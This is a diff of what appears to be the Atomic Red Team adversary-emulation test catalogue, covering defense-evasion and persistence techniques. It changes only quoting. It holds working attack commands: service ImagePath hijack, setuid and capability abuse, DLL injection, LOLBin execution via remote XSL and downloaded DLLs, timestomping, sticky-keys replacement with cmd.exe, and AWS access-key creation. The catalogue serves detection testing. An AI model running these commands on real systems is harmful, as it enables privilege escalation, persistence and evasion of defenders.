@@ -36571,7 +36571,7 @@ defense-evasion: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -36591,22 +36591,22 @@ defense-evasion: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1548.001: technique: @@ -36662,7 +36662,7 @@ defense-evasion: description: 'Make, change owner, and change file attributes on a C source code file -' + ' supported_platforms: - macos - linux @@ -36688,7 +36688,7 @@ defense-evasion: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -36704,14 +36704,14 @@ defense-evasion: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -36727,7 +36727,7 @@ defense-evasion: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Make and modify capabilities of a binary @@ -36759,7 +36759,7 @@ defense-evasion: description: 'This test gives a file the capability to set UID without using flags. -' + ' supported_platforms: - linux input_arguments: 
@@ -36773,7 +36773,7 @@ defense-evasion: sudo setcap cap_setuid=ep #{file_to_setcap} cleanup_command: 'rm #{file_to_setcap} -' + ' name: sh elevation_required: true T1218: @@ -36832,7 +36832,7 @@ defense-evasion: description: 'Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. -' + ' supported_platforms: - windows input_arguments: @@ -36848,17 +36848,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} -' + ' name: command_prompt elevation_required: true - name: SyncAppvPublishingServer - Execute arbitrary PowerShell code @@ -36866,7 +36866,7 @@ defense-evasion: description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. -' + ' supported_platforms: - windows input_arguments: @@ -36877,14 +36877,14 @@ defense-evasion: executor: command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}" -' + ' name: command_prompt - name: Register-CimProvider - Execute evil dll auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB -' + ' supported_platforms: - windows input_arguments: 
@@ -36896,17 +36896,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} -' + ' name: command_prompt - name: InfDefaultInstall.exe .inf Execution auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef @@ -36925,17 +36925,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" executor: command: 'InfDefaultInstall.exe #{inf_to_execute} -' + ' name: command_prompt - name: ProtocolHandler.exe Downloaded a Suspicious File auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 @@ -36943,7 +36943,7 @@ defense-evasion: Office. On successful execution you should see Microsoft Word launch a blank file. -' + ' supported_platforms: - windows input_arguments: 
@@ -36956,15 +36956,15 @@ defense-evasion: - description: 'Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided -' + ' prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} -' + ' get_prereq_command: 'write-host "Install Microsoft Word or provide correct path." -' + ' executor: name: command_prompt elevation_required: false @@ -36976,7 +36976,7 @@ defense-evasion: description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe -' + ' supported_platforms: - windows input_arguments: @@ -36998,15 +36998,15 @@ defense-evasion: prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} -' + ' get_prereq_command: 'write-host ".Net must be installed for this test to work correctly." -' + ' executor: command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt -' + ' name: powershell elevation_required: false - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions @@ -37014,7 +37014,7 @@ defense-evasion: description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe -' + ' supported_platforms: - windows input_arguments: @@ -37043,7 +37043,7 @@ defense-evasion: get_prereq_command: 'write-host "you need to rename workflow complier before you run this test" -' + ' executor: command: "#{renamed_binary} #{xml_payload} output.txt\n" name: powershell @@ -37086,7 +37086,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}' 
@@ -37153,14 +37153,14 @@ defense-evasion: executor: command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}" -' + ' name: command_prompt - name: manage-bde.wsf Signed Script Command Execution auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a description: 'Executes the signed manage-bde.wsf script with options to execute an arbitrary command. -' + ' supported_platforms: - windows input_arguments: @@ -37174,7 +37174,7 @@ defense-evasion: cscript %windir%\System32\manage-bde.wsf cleanup_command: 'set comspec=%windir%\System32\cmd.exe -' + ' name: command_prompt T1027.002: technique: @@ -37250,10 +37250,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary packed by UPX, with modified headers (linux) auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 @@ -37272,10 +37272,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary simply packed by UPX auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 @@ -37292,10 +37292,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary packed by UPX, with modified headers auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d @@ -37314,10 +37314,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh T1036.006: technique: @@ -37371,7 +37371,7 @@ defense-evasion: auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f description: 'Space After Filename -' + ' supported_platforms: - macos executor: 
@@ -37383,7 +37383,7 @@ defense-evasion: auto_generated_guid: b95ce2eb-a093-4cd8-938d-5258cef656ea description: 'Space after filename. -' + ' supported_platforms: - macos - linux @@ -37605,7 +37605,7 @@ defense-evasion: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. -' + ' supported_platforms: - macos - linux @@ -37619,7 +37619,7 @@ defense-evasion: This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -37634,7 +37634,7 @@ defense-evasion: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -37744,7 +37744,7 @@ defense-evasion: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; -' + ' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -37754,7 +37754,7 @@ defense-evasion: This is meant to find the result of Not supported, which is the result if run in a virtual machine -' + ' supported_platforms: - windows executor: @@ -37771,7 +37771,7 @@ defense-evasion: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. -' + ' supported_platforms: - macos executor: @@ -37781,7 +37781,7 @@ defense-evasion: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; -' + ' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system 
@@ -38036,7 +38036,7 @@ defense-evasion: executor: command: 'start #{docx_file} -' + ' name: command_prompt T1055.003: technique: @@ -38279,7 +38279,7 @@ defense-evasion: auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 description: 'Stomps on the access timestamp of a file -' + ' supported_platforms: - linux - macos @@ -38291,13 +38291,13 @@ defense-evasion: executor: command: 'touch -a -t 197001010000.00 #{target_filename} -' + ' name: sh - name: Set a file's modification timestamp auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 description: 'Stomps on the modification timestamp of a file -' + ' supported_platforms: - linux - macos @@ -38309,7 +38309,7 @@ defense-evasion: executor: command: 'touch -m -t 197001010000.00 #{target_filename} -' + ' name: sh - name: Set a file's creation timestamp auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b @@ -38355,7 +38355,7 @@ defense-evasion: executor: command: 'touch -acmr #{reference_file_path} #{target_file_path} -' + ' name: sh - name: Windows - Modify file creation timestamp with PowerShell auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c @@ -38378,10 +38378,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the creation time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38389,10 +38389,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Modify file last modified timestamp with PowerShell auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 
@@ -38415,10 +38415,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the modified time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38426,10 +38426,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Modify file last access timestamp with PowerShell auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 @@ -38452,10 +38452,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the last access time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38463,10 +38463,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Timestomp a File auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 
@@ -38484,25 +38484,25 @@ defense-evasion: dependencies: - description: 'timestomp.ps1 must be present in #{file_path}. -' + ' prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1" -' + ' - description: 'kxwn.lock must be present in #{file_path}. -' + ' prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File -' + ' executor: command: | import-module #{file_path}\timestomp.ps1 @@ -39476,10 +39476,10 @@ defense-evasion: - description: 'Test requrires a file to take ownership of to be located at (#{file_folder_to_own}) -' + ' prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_folder_to_own} echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt @@ -39487,7 +39487,7 @@ defense-evasion: executor: command: 'takeown.exe /f #{file_folder_to_own} /r -' + ' name: command_prompt - name: cacls - Grant permission to specified user or group recursively auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 @@ -39510,10 +39510,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) -' + ' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_cacls1 >> #{file_or_folder}\T1222.001_cacls1.txt @@ -39521,7 +39521,7 @@ defense-evasion: executor: command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F -' + ' name: command_prompt - name: attrib - Remove read-only attribute auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 
@@ -39539,10 +39539,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) -' + ' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt @@ -39552,7 +39552,7 @@ defense-evasion: executor: command: 'attrib.exe -r #{file_or_folder}\*.* /s -' + ' name: command_prompt - name: attrib - hide file auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c @@ -39575,7 +39575,7 @@ defense-evasion: attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt cleanup_command: 'del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1 -' + ' name: command_prompt - name: Grant Full Access to folder for Everyone - Ryuk Ransomware Style auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 @@ -39600,18 +39600,18 @@ defense-evasion: - description: 'Backup of original folder permissions should exist (for use in cleanup commands) -' + ' prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1 -' + ' executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1220: 
@@ -39725,37 +39725,37 @@ defense-evasion: dependencies: - description: 'XML file must exist on disk at specified location (#{xmlfile}) -' + ' prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" - description: 'XSL file must exist on disk at specified location (#{xslfile}) -' + ' prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) -' + ' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" -' + ' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del #{msxsl_exe} >nul 2>&1 -' + ' name: command_prompt - name: MSXSL Bypass using remote files auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 
@@ -39783,26 +39783,26 @@ defense-evasion: dependencies: - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) -' + ' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" -' + ' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del -Path #{msxsl_exe} >nul 2>&1 -' + ' name: command_prompt - name: WMIC bypass using local XSL file auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 description: 'Executes the code specified within a XSL script using a local payload. -' + ' supported_platforms: - windows input_arguments: @@ -39818,17 +39818,17 @@ defense-evasion: dependencies: - description: 'XSL file must exist on disk at specified location (#{local_xsl_file}) -' + ' prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}" -' + ' name: command_prompt - name: WMIC bypass using remote XSL file auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b @@ -39836,7 +39836,7 @@ defense-evasion: payload. Open Calculator.exe when test successfully executed, while AV turned off. -' + ' supported_platforms: - windows input_arguments: @@ -39851,7 +39851,7 @@ defense-evasion: executor: command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}" -' + ' name: command_prompt persistence: T1546.008: 
@@ -39945,7 +39945,7 @@ persistence: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" -' + ' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -39953,7 +39953,7 @@ persistence: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe -' + ' type: Path default: C:\windows\system32\cmd.exe executor: @@ -39987,7 +39987,7 @@ persistence: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe -' + ' supported_platforms: - windows executor: @@ -39998,7 +39998,7 @@ persistence: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe -' + ' name: command_prompt elevation_required: true T1098: @@ -40075,7 +40075,7 @@ persistence: auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af description: 'Manipulate Admin Account Name -' + ' supported_platforms: - windows executor: @@ -40141,7 +40141,7 @@ persistence: dependencies: - description: 'PS Module ActiveDirectory -' + ' prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: | @@ -40164,14 +40164,14 @@ persistence: cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False -' + ' name: powershell - name: AWS - Create a group and add a user to that group auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122 description: 'Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss -' + ' supported_platforms: - iaas:aws input_arguments: 
@@ -40183,14 +40183,14 @@ persistence: - description: 'Check if the user exists, we can only add a user to a group if the user exists. -' + ' prereq_command: 'aws iam list-users | grep #{username} -' + ' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic test -' + ' executor: command: | aws iam create-group --group-name #{username} @@ -40404,7 +40404,7 @@ persistence: command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))" -' + ' T1098.001: technique: external_references: @@ -40511,14 +40511,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: command: | Import-Module -Name AzureAD @@ -40591,14 +40591,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: command: | Import-Module -Name AzureAD @@ -40642,7 +40642,7 @@ persistence: description: 'Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised -' + ' supported_platforms: - iaas:aws input_arguments: @@ -40653,14 +40653,14 @@ persistence: dependencies: - description: 'Check if the user exists. -' + ' prereq_command: 'aws iam list-users | grep #{username} -' + ' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic -' + ' executor: command: | aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds 
@@ -40855,11 +40855,11 @@ persistence: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) -' + ' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -40868,11 +40868,11 @@ persistence: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) -' + ' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -40880,10 +40880,10 @@ persistence: executor: command: 'reg.exe import #{registry_file} -' + ' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.011: 
@@ -40991,31 +40991,31 @@ persistence: - description: 'Shim database file must exist on disk at specified location (#{file_path}) -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll -' + ' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} -' + ' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -41108,7 +41108,7 @@ persistence: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: 
@@ -41124,30 +41124,30 @@ persistence: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -41244,7 +41244,7 @@ persistence: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -41428,10 +41428,10 @@ persistence: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} -' + ' cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -41455,10 +41455,10 @@ persistence: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} -' + ' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore -' + ' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -41496,7 +41496,7 @@ persistence: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 
@@ -41528,10 +41528,10 @@ persistence: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr -' + ' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 -' + ' name: command_prompt T1547: technique: @@ -41856,7 +41856,7 @@ persistence: auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 description: 'Create a file called test.wma, with the duration of 30 seconds -' + ' supported_platforms: - linux - windows @@ -41876,7 +41876,7 @@ persistence: sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. -' + ' supported_platforms: - windows - macos @@ -41996,7 +41996,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42041,7 +42041,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42079,7 +42079,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
